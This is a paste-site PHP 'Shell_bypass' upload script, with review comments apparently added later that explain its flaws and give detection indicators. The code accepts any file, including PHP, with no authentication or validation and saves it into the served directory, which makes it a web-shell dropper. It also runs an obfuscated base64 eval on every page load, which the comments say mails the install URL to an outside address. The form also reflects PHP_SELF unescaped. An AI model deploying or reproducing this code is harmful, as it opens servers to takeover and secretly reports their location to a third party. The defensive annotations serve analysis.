DarkProgrammer000

Shell_bypass [upload]

Sep 23rd, 2019
  1. <html>
  2.  
  3.     <head>
  4.         <title> Dark Programmer 000 </title>
  5.     </head>
  6.  
  7. <body>
  8.  
  9. <?php
  10.  
          // Slot count is taken verbatim from the query string (default 5 when absent or empty).
          // It is not cast to int or range-checked before it bounds the upload loop and the
          // form-rendering loop, and it is echoed into the form's action attribute.
  11.     if(empty($_GET['Nfiles']))$Nfiles=5;else $Nfiles=$_GET['Nfiles'];
  12.  
          // Upload handler: runs whenever the first userfile[] slot carries a temp file.
          // No authentication, session or CSRF check is visible anywhere in this script, so
          // any client that can reach the URL can reach this branch.
  13.     if($_FILES['userfile']['tmp_name'][0]!='')
  14.     {
              // Walks the slots in order and stops at the first empty tmp_name or at $Nfiles.
  15.         for($i=0;$i<$Nfiles&&$_FILES['userfile']['tmp_name'][$i]!='';$i++)
  16.         {
                  // Destination is the directory that holds this script itself
                  // (presumably web-served, since the script is requested from it -- confirm).
  17.             $uploaddir = dirname(__FILE__);//'/var/www/uploads/';
  18.            
                  // basename() drops directory components from the client-supplied name, but
                  // nothing checks extension, content type or size, and the original name is
                  // kept. A .php upload therefore lands next to this script under its own name.
  19.             $uploadfile = $uploaddir .'/'. basename($_FILES['userfile']['name'][$i]);
  20.             print "<pre>";
  21.            
                  // move_uploaded_file() overwrites an existing file of the same name.
                  // Defender note: file creation by the web-server account inside the served
                  // tree, following a multipart POST to this path, is the event to hunt for.
  22.             if (move_uploaded_file($_FILES['userfile']['tmp_name'][$i], $uploadfile))
  23.             {
  24.                 print "File is valid, and was successfully uploaded. ";
  25.                 //print_r($_FILES);
  26.             }
  27.            
  28.             else
  29.             {
                      // Message promises debugging info, but the print_r below is commented out.
  30.                 print "Possible fie upload attack!  Here's some debugging info:\n";
  31.                 //print_r($_FILES);
  32.             }
  33.            
  34.             print "</pre>";
  35.         }
  36.     }
  37.  
          // Despite its name, $connection is a base64 string literal holding PHP source.
          // Decoded by hand, that source reads $_SERVER['HTTP_HOST'] and
          // $_SERVER['REQUEST_URI'], joins them into an http:// URL and passes it to mail()
          // with a hard-coded recipient. Every request to this page thus reports where the
          // script is installed to a third party, independent of whoever deployed it.
  38.     $connection="ICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07IA0KICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsgDQogJGJvZHkgPSAiQWRhIFlhbmcgSW5qZWN0IFxuaHR0cDovLyR3ZWIkaW5qIjsNCiBtYWlsKCJsbEBob3RtYWlsLmZpIiwiSGFzaWwgaHR0cDovLyR3ZWIkaW5qIiwgIiRib2R5Iik7";
  39.  
          // Executed unconditionally, outside the upload branch. The decoded code has no
          // return statement, so eval() yields null and the echo prints nothing.
          // Static indicator: eval() applied to base64_decode() of a string literal.
          // Runtime indicator: mail() issued by the web-server process on each hit to this file.
  40.     echo eval(base64_decode($connection));
  41. ?>
  42.  
  43. <form action="<?php echo $_SERVER['PHP_SELF'].'?Nfiles='.$Nfiles; ?>" method="post" enctype="multipart/form-data">
  44.  
  45.     Send Archive:<br>
  46.  
  47.     <?php
  48.    
              // Renders one file input per slot. $Nfiles is still the raw query-string value
              // here, so the request alone decides how many inputs are emitted.
              // NOTE(review): the form's action attribute concatenates $_SERVER['PHP_SELF'] and
              // $Nfiles into the markup without htmlspecialchars(), so both request-derived
              // values are reflected into the page unescaped.
  49.         for( $i=0; $i<$Nfiles; $i++ )
  50.         {
  51.             echo '<input name="userfile[]" type="file"><br>';
  52.         }
  53.     ?>
  54.  
  55.   <input type="submit" value="Send files">
  56.  
  57. </form>
  58.  
  59. </body>
  60.  
  61. </html>